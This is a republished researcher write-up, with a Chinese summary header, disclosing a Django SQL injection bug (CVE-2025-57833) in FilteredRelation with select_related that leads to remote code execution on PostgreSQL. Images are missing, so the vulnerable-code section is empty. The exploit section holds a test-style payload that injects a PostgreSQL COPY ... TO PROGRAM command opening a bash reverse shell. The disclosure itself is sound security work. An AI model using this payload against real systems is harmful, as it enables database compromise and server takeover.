Django发现严重漏洞CVE-2025–57833,允许攻击者通过PostgreSQL实现远程代码执行及所有数据库SQL注入。漏洞源于使用`FilteredRelation`与`select_related`函数构造恶意SQL查询。攻击者可利用PostgreSQL的`COPY`和`PROGRAM`功能执行反向shell以获取控制权。 2025-9-5 05:43:11 Author: infosecwriteups.com(查看原文) 阅读量:28 收藏
Article about the critical CVE-2025–57833 I found in Django.
Press enter or click to view image in full size
Impact:
RCE on PostgreSQL and SQL Injection on all of the databases.
Vulnerable code:
Vulnerability detection:
In order for you to be vulnerable, you need to use the ‘FilteredRelation’ function as above, with ‘select_related’. An attacker with control over the ‘FilteredRelation’ and the ‘select_related’ as above will be able to exploit the vulnerability.
Exploit:
The ‘select_related’ argument is the one that gets into the SQL query; however, Django checks in the above code that the first ‘user_data’ and the second ‘user_data’ are the same. The above code will not work because of the + “e”.
Obtain RCE:
The code below will use PostgreSQL “copy” and “program” to execute a reverse shell:
def test_select_related_foreign_key_sqli(self):
user_data = 'author_join."id", author_join."name", author_join."content_type_id", author_join."object_id" FROM "filtered_relation_book" INNER JOIN "filtered_relation_author" author_join ON ("filtered_relation_book"."author_id" = author_join."id") ; COPY (SELECT \'\') TO PROGRAM \'bash -i >& /dev/tcp/127.0.0.1/1025 0>&1\'; -- ' qs = (
Book.objects.annotate(**{
user_data: FilteredRelation("author"),
})
.select_related(user_data)
)
qs._fetch_all()
Proof of Concept (PoC):
Press enter or click to view image in full size
EyalSec CVEs:
https://github.com/EyalSec/EyalSec_CVE/
If you have any questions or you want to collaborate with me, you can email me at: [email protected]
如有侵权请联系:admin#unsafe.sh